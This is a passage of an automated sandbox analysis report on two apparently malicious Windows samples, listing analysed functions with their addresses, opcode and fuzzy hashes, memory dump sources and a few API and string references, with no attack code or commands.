Instruction ID: 6d11644ae64138b315122eb466222d81ff18034fa2aee2fba486818fcf65f410
Opcode Fuzzy Hash: c4d3b038e804a75c6507f294c4307183b6f68254fce9092e3f9dec1c7bcdc295
Instruction Fuzzy Hash: 24819E229B9D0E07F35C5FA8EC4ABB17182F350321F99933EC949D22D7DD6C8586818A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935D178 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc697977a2dbc44bcf5d71fae94727640bfa25f968f69afeebb3474bb7f2c5e3
Instruction ID: 3071f6981973723dd3bdce2dadbbe04952f4818111a735970d7cd9554840872c
Opcode Fuzzy Hash: bc697977a2dbc44bcf5d71fae94727640bfa25f968f69afeebb3474bb7f2c5e3
Instruction Fuzzy Hash: 2F71AF32AB5D1D47F76C4BA9EC4ABA1B281F350311FAA437F880DD36D6CC6D588681C6

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935CF16 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 904e1acac4a6d22c1df4d95c66284634aeb24be9c2737b7b8aafe64209461c43
Instruction ID: 969bb279703a6a2814c2aa85222dae699ef1561301adcb791e3f6ad612e1f7e2
Opcode Fuzzy Hash: 904e1acac4a6d22c1df4d95c66284634aeb24be9c2737b7b8aafe64209461c43
Instruction Fuzzy Hash: C981B3329B4E1E47F75C9FA9E856BB072D0F704320F99427EC94ED32C2CD6D58868686

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935D169 Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 916a4e1a61a903ff8adb96817d547a6bcb9055f67fb451cdaf07895dd0572043
Instruction ID: 88a05729400ee39d1654a540055c6f6582c626e9278b01d0d82a11fca15afd60
Opcode Fuzzy Hash: 916a4e1a61a903ff8adb96817d547a6bcb9055f67fb451cdaf07895dd0572043
Instruction Fuzzy Hash: F47164326B5D0E47F75C9FB9EC4ABE17182F780321F99837E9449C26CADC7C54868186

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935D05B Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd35cf4883baad2ef06799d1470d484e4cc64c1736b1a2f99d627104b4dce62a
Instruction ID: 56816a9d3e0baaca7c3036996ab6d35098ca308bd94d9e35a42113acc0f0a16a
Opcode Fuzzy Hash: cd35cf4883baad2ef06799d1470d484e4cc64c1736b1a2f99d627104b4dce62a
Instruction Fuzzy Hash: 37814D32AA5D0D4BF75C9F9AE846BA072D2F754320F99427ED80DC32D2DD7C9886C246

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935CFE8 Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 329854ad399739b47f7cb972abef77d5827ccabb093efce480363c1d983ded92
Instruction ID: aa9c5dd93a25d213f3aad3bd815d780362e0ea34b073c798a1e8f7e971393fd4
Opcode Fuzzy Hash: 329854ad399739b47f7cb972abef77d5827ccabb093efce480363c1d983ded92
Instruction Fuzzy Hash: 5A71CB316BAE0C17F74C5FA9EC8ABA17282F354311F98427ED809C32D7CD6C9486C24A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935CFB6 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5b5014b5559fec6cebc429e76b2db7d5d62d93a21224ef5914d0d196408a41f
Instruction ID: ef31cebb7297b12dd03661c8fc8304893b2c0752c67f4d736bd7cc3f34dae452
Opcode Fuzzy Hash: f5b5014b5559fec6cebc429e76b2db7d5d62d93a21224ef5914d0d196408a41f
Instruction Fuzzy Hash: E871A2306A5F0E4BF75C9FA9E886BA172C2F744320F98427ED509C32D7CDAC5886C246

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935CE58 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3856193f6be20ee1ff04d5978c52dea718d7a31fa8af56303b8ad1dcffbd30e4
Instruction ID: 6daed5ea56c055482b4781f42f1796223af228dbe1120eb0275e0c2826909c76
Opcode Fuzzy Hash: 3856193f6be20ee1ff04d5978c52dea718d7a31fa8af56303b8ad1dcffbd30e4
Instruction Fuzzy Hash: B571A322AB8E1D47F76C5BA9EC86BE17281F744310F99427EDA1DD32C7DD7C08868186

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935CFD9 Relevance: .3, Instructions: 296COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61b0607203b8969ae1c5f6e7a8f3b2c0bfcd1711d8ff577b92c32d780ad8e807
Instruction ID: 8ac0934407f7fb123c7813de57ab3e1fe15d4fbe5f55242f18228597fb53060a
Opcode Fuzzy Hash: 61b0607203b8969ae1c5f6e7a8f3b2c0bfcd1711d8ff577b92c32d780ad8e807
Instruction Fuzzy Hash: 2A71A0329A9E0E4BF76C9FA9EC457A172D1F744320F99427EC90DD32C6DD7C48868286

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935D056 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98da1448c33265e68fabeb1fd232a0a2cbf988b6633f4f028136ea7aaa0839c2
Instruction ID: 9515ecf8428cc0768bc00fc0fe9d8b24d59a2003334f3a50541912eb2700b054
Opcode Fuzzy Hash: 98da1448c33265e68fabeb1fd232a0a2cbf988b6633f4f028136ea7aaa0839c2
Instruction Fuzzy Hash: BE71BF31ABAD0D47F75C5FA9E85ABA1B2C1F754320F9943BEC90AC32C6CD6C5486C285

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935E135 Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1c636e00f0baea373b751511971939fd0546bc1346f4d39a8dcbd67106c9c3d
Instruction ID: 4a5d9f4cdd9f7c12c3fa09068ea9f9daf31bbf89b8e939c787651e9bf7381145
Opcode Fuzzy Hash: e1c636e00f0baea373b751511971939fd0546bc1346f4d39a8dcbd67106c9c3d
Instruction Fuzzy Hash: 547190329A9D0D47F76C9FA9EC4A7A13281F754321F99827ED84CC32C7DD6C98868186

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935CD9F Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f16b03636d0978438094ce4918d1aadbf1fc445b10dad5645fb0e77840243fee
Instruction ID: 99781614e9c42e8bf58aab0fdcf8eb4a86e4fd2fdb5766e5264b7826c895b954
Opcode Fuzzy Hash: f16b03636d0978438094ce4918d1aadbf1fc445b10dad5645fb0e77840243fee
Instruction Fuzzy Hash: B6717C329A9D0D47F76C9FA9EC4A7A13281F754321F99827ED84CC32C7DD6C9886C186

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935CF73 Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f37ee97c395220a065971ddba4ed9a0a1333830fe67664b4db2c1c15049e411e
Instruction ID: b109a924182f0d5915e9f1203198a9e8ce1d4c71d6e7c73ab23df84dc8eea853
Opcode Fuzzy Hash: f37ee97c395220a065971ddba4ed9a0a1333830fe67664b4db2c1c15049e411e
Instruction Fuzzy Hash: D4717B329B9E1D47F76C5FA9E846BA1B280F700320F99037ECD5DD32D2ED5D5886818A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935D18C Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54e355cb01846705105d6b6910e76099398e4ff1f0a3f4de91bf53025c307313
Instruction ID: beaf96f866f58c0dd71be8a48f6bfb0cdf05c11797ce2126eb5e6b073a9eb108
Opcode Fuzzy Hash: 54e355cb01846705105d6b6910e76099398e4ff1f0a3f4de91bf53025c307313
Instruction Fuzzy Hash: 34616132A76D0D07F75C8FA9EC06B91B183F784321FA9C27D9449C36CADD7C44868686

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935D4BD Relevance: .3, Instructions: 258COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473d4cc86e5e16da59ebb98acee0eb93f100bacb4447fb125f3ee3cdbe1c5bb
Instruction ID: 5a07b11ea027c4af06d2d061a437804900d0550af81d3653c8860b15ea0b0fd4
Opcode Fuzzy Hash: 2473d4cc86e5e16da59ebb98acee0eb93f100bacb4447fb125f3ee3cdbe1c5bb
Instruction Fuzzy Hash: 0651C532AB9D1D07F75C5FA9EC45BA171C2F744320FAA827ED84CD32C6DC6C58868286

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935CD90 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11b50409f1795475aa11c3c78b3d433906134c0a26625d64038c95fae9da1a0d
Instruction ID: 0ac19dfb76d4748fb25f90dafe21240e47310fe86bca631d785c51420ec95464
Opcode Fuzzy Hash: 11b50409f1795475aa11c3c78b3d433906134c0a26625d64038c95fae9da1a0d
Instruction Fuzzy Hash: 1151B532AB9D1D07F75C5FA9EC45BA171C2F744320FAA827ED84CD32C6DD6C58868186

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF649274E27 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF64926D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF64926D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff64926d000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 868900fce3639b63895a83c70b9198c80f379cd325ee6846adf3d5ccda955057
Instruction ID: 4e10426a9ddc2f7175dd3df576732e588ad5f182cdf20ec0a17cdcd06d870185
Opcode Fuzzy Hash: 868900fce3639b63895a83c70b9198c80f379cd325ee6846adf3d5ccda955057
Instruction Fuzzy Hash: 1E514632148AD29FD702CB74D4926AAFBA4FF8633171456A6C1D3CB853C71568A7CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6493675AB Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac0cc26206da24d93efafb87fd15590f8284c257ecb7e9ee655a920ee77b23f4
Instruction ID: 3d40cf5d3112546fed31dcf934f833162c4e0ad29516f05ac241c57a457ce061
Opcode Fuzzy Hash: ac0cc26206da24d93efafb87fd15590f8284c257ecb7e9ee655a920ee77b23f4
Instruction Fuzzy Hash: 52415363AB9D0E07F75C4B78EC5ABB16082F380310F9943BEC90DD31C6CC6C55869589

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF64935D123 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1968244486.00007FF649359000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF649359000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff649359000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22bacec1c17bfd1cb6c7e8e97fcfd2cfc09dddf6d22f2405f95e2786a376216d
Instruction ID: 4bb1004c4b628a98116cc47a92cfde11731d88cd70cc97469391ebe0333a2d8d
Opcode Fuzzy Hash: 22bacec1c17bfd1cb6c7e8e97fcfd2cfc09dddf6d22f2405f95e2786a376216d
Instruction Fuzzy Hash: D5210932991D1E4BE7585E8AD941790B2D2FB94320F6A427ED88CD33C5CA7D9882C746

Uniqueness

Uniqueness Score: -1.00%

Function 0000029623C7CC96 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.1921249746.0000029623C76000.00000004.00000020.00020000.00000000.sdmp, Offset: 0000029623C76000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_29623c76000_i1crvbOZAP.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84157a0b6a3f3d793912fe6671fa4faaa5ec58ab69bbdd74ca35865a4152c680
Instruction ID: 6ca3f395e9fcb11e66d263ae9c83f7414a9ea8f0e4e51d0fa5b028379b638601
Opcode Fuzzy Hash: 84157a0b6a3f3d793912fe6671fa4faaa5ec58ab69bbdd74ca35865a4152c680
Instruction Fuzzy Hash: 0431463240A6C09FDB26CF35C4556CB3FB6FF96714B19C8D9C8809E427C366A91ACB42

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: uRWnWA7bjEhugCQgmREIdGsh.exePID: 7608, Parent PID: 6984COMMON

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.7%
Total number of Nodes:	217
Total number of Limit Nodes:	4

Executed Functions

Function 003DE084 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 003DE093

Strings

a, xrefs: 004EC82D
#, xrefs: 004C7A17

Memory Dump Source

Source File: 00000005.00000002.2887899430.0000000000296000.00000020.00000001.01000000.00000006.sdmp, Offset: 00130000, based on PE: true

Associated: 00000005.00000002.2874887237.0000000000130000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2875323641.0000000000131000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2881330381.000000000023F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2883795898.0000000000263000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2885648592.0000000000268000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887116159.0000000000290000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2893541562.0000000000558000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2894337668.0000000000559000.00000020.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_130000_uRWnWA7bjEhugCQgmREIdGsh.jbxd

Similarity

API ID: InfoSystem
String ID: #$a
API String ID: 31276548-236425667
Opcode ID: 2ce1ee5a18bf65384d29ce0b18b052def3fe663f07971ae8390f9ae0a5090cd6
Instruction ID: b800e73a56d1d0b6efd35d6e1aab9f87ffb95ad1c09b189c6b3ace3d19174b69
Opcode Fuzzy Hash: 2ce1ee5a18bf65384d29ce0b18b052def3fe663f07971ae8390f9ae0a5090cd6
Instruction Fuzzy Hash: 99F02D704143458ED725FFA18816BAB77D1AF51305F44D80DF49E472C1D93CE8549667

Uniqueness

Uniqueness Score: -1.00%

Function 0014E0A0 Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

closesocket.WS2_32(00000000), ref: 0014E19E

Memory Dump Source

Source File: 00000005.00000002.2875323641.0000000000131000.00000020.00000001.01000000.00000006.sdmp, Offset: 00130000, based on PE: true

Associated: 00000005.00000002.2874887237.0000000000130000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2881330381.000000000023F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2883795898.0000000000263000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2885648592.0000000000268000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887116159.0000000000290000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887899430.0000000000296000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2893541562.0000000000558000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2894337668.0000000000559000.00000020.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_130000_uRWnWA7bjEhugCQgmREIdGsh.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 2081001c2e7cbb547c2470fbe54d1482450d3ee6171c92cec88e23c62788b2e6
Instruction ID: a5b97ce76378224a5d569521e63705fe4362c580beba9d25ed3b3aeb5cc878b1
Opcode Fuzzy Hash: 2081001c2e7cbb547c2470fbe54d1482450d3ee6171c92cec88e23c62788b2e6
Instruction Fuzzy Hash: 2231E272604310AFD721AF79DC45B6BBBE4BF85724F004B1EF9A4972E1D33199088B92

Uniqueness

Uniqueness Score: -1.00%

Function 00224B12 Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,002249F9,00000000,CF830579,00261140,0000000C,00224AB5,00218BBD,?), ref: 00224B68
GetLastError.KERNEL32(?,002249F9,00000000,CF830579,00261140,0000000C,00224AB5,00218BBD,?), ref: 00224B72

Memory Dump Source

Source File: 00000005.00000002.2875323641.0000000000131000.00000020.00000001.01000000.00000006.sdmp, Offset: 00130000, based on PE: true

Associated: 00000005.00000002.2874887237.0000000000130000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2881330381.000000000023F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2883795898.0000000000263000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2885648592.0000000000268000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887116159.0000000000290000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887899430.0000000000296000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2893541562.0000000000558000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2894337668.0000000000559000.00000020.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_130000_uRWnWA7bjEhugCQgmREIdGsh.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 62df0d27ae83e8923b640227573e3051bd949f2116dbdf295adf45b2c8207677
Instruction ID: c88b4b8e92f8857f8e078f95da05b8d4e2000e4fdea27c777c3af1a124a30b02
Opcode Fuzzy Hash: 62df0d27ae83e8923b640227573e3051bd949f2116dbdf295adf45b2c8207677
Instruction Fuzzy Hash: B9114C33E3013477CB247AF57809B7D67498B82778F290259F8148B1D2EFA0D8514955

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 003D7ED7 Relevance: 35.5, Strings: 28, Instructions: 460COMMON

Download Yara Rule

Strings

kkos, xrefs: 00145254
wYKn, xrefs: 00144FCA
K`io, xrefs: 00144FFC
^BZJ, xrefs: 001451C5
{beK, xrefs: 00144FF2
Gx|w, xrefs: 0014517F
xdaa, xrefs: 00144EC8
Gx|w, xrefs: 00144FE8
{be7, xrefs: 00145189
wYKn, xrefs: 00145161
Pdmn, xrefs: 00144EB4
k{ex, xrefs: 00144FD4
EL{, xrefs: 001451BB
SE[\, xrefs: 001451CF
ckzS, xrefs: 00145175
ry{m, xrefs: 0014519D
ckzS, xrefs: 00144FDE
k{ex, xrefs: 0014516B
g{ce, xrefs: 0014525E
|sGB, xrefs: 001451A7
csgf, xrefs: 0014506A
pxub, xrefs: 00144DB6
ibkf, xrefs: 00144FC0
ndnz, xrefs: 00144EAA
\||~, xrefs: 00145193
fnKh, xrefs: 00144EBE
inpN, xrefs: 0014524A
ibkf, xrefs: 00145157

Memory Dump Source

Source File: 00000005.00000002.2887899430.0000000000296000.00000020.00000001.01000000.00000006.sdmp, Offset: 00130000, based on PE: true

Associated: 00000005.00000002.2874887237.0000000000130000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2875323641.0000000000131000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2881330381.000000000023F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2883795898.0000000000263000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2885648592.0000000000268000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887116159.0000000000290000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2893541562.0000000000558000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2894337668.0000000000559000.00000020.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_130000_uRWnWA7bjEhugCQgmREIdGsh.jbxd

Similarity

API ID:
String ID: EL{$Gx|w$Gx|w$K`io$Pdmn$SE[\$\||~$^BZJ$ckzS$ckzS$csgf$fnKh$g{ce$ibkf$ibkf$inpN$kkos$k{ex$k{ex$ndnz$pxub$ry{m$wYKn$wYKn$xdaa${be7${beK$|sGB
API String ID: 0-3282820557
Opcode ID: 4aaddb1e6c6f3622aecfb4735b21804a52acce493f196fb685a1f60771343a49
Instruction ID: 4600eb56338fd10ed21956db6f38289b5ab22e4866cc85862896ca2a1c8e6054
Opcode Fuzzy Hash: 4aaddb1e6c6f3622aecfb4735b21804a52acce493f196fb685a1f60771343a49
Instruction Fuzzy Hash: 1212DB70A04269CFDB28CF58C891BAEBBB2FF44704F54809ED4496B252D771AE45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 002184A0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2875323641.0000000000131000.00000020.00000001.01000000.00000006.sdmp, Offset: 00130000, based on PE: true

Associated: 00000005.00000002.2874887237.0000000000130000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2881330381.000000000023F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2883795898.0000000000263000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2885648592.0000000000268000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887116159.0000000000290000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887899430.0000000000296000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2893541562.0000000000558000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2894337668.0000000000559000.00000020.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_130000_uRWnWA7bjEhugCQgmREIdGsh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c08bf53a9f677e8c2d8ddc149f1db4f6bd49f153408b89a933c5f01008980b9a
Instruction ID: bde0113280cfbda9c95275b2583dce71ed5cd7b5b2f1ff4133e380229173fa05
Opcode Fuzzy Hash: c08bf53a9f677e8c2d8ddc149f1db4f6bd49f153408b89a933c5f01008980b9a
Instruction Fuzzy Hash: 4D025B71E1121A9BDF14CFA8C8C06EEFBF5FF58314F258269D919A7380DB31A9518B90

Uniqueness

Uniqueness Score: -1.00%

Function 00443A57 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

8, xrefs: 004B96B8

Memory Dump Source

Source File: 00000005.00000002.2887899430.0000000000296000.00000020.00000001.01000000.00000006.sdmp, Offset: 00130000, based on PE: true

Associated: 00000005.00000002.2874887237.0000000000130000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2875323641.0000000000131000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2881330381.000000000023F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2883795898.0000000000263000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2885648592.0000000000268000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2887116159.0000000000290000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2893541562.0000000000558000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2894337668.0000000000559000.00000020.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_130000_uRWnWA7bjEhugCQgmREIdGsh.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 64fd0f13ed3992f98cffbe26b553ed11fb7c46a88034258a585e48cb19518586
Instruction ID: 4bb84f98de78db2b2db05e359ba4cfcc376166552337f32412da4978cd91f421
Opcode Fuzzy Hash: 64fd0f13ed3992f98cffbe26b553ed11fb7c46a88034258a585e48cb19518586
Instruction Fuzzy Hash: BEE02B6000838067CE92BFA6848649E73D8AF95304F5018487E6006602D7248924C767

Uniqueness

Uniqueness Score: -1.00%

Function 00144100 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2875323641.0000000000131000.00000020.00000001.01000000.00000006.sdmp, Offset: 00130000, based on PE: true

Associated: 00000005.00000002.2874887237.0000000000130000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2881330381.000000000023F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2883795898.0000000000263000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2885648592.0000000000268000.00000020.00000001.01000000.00000006.sdmpDownload File
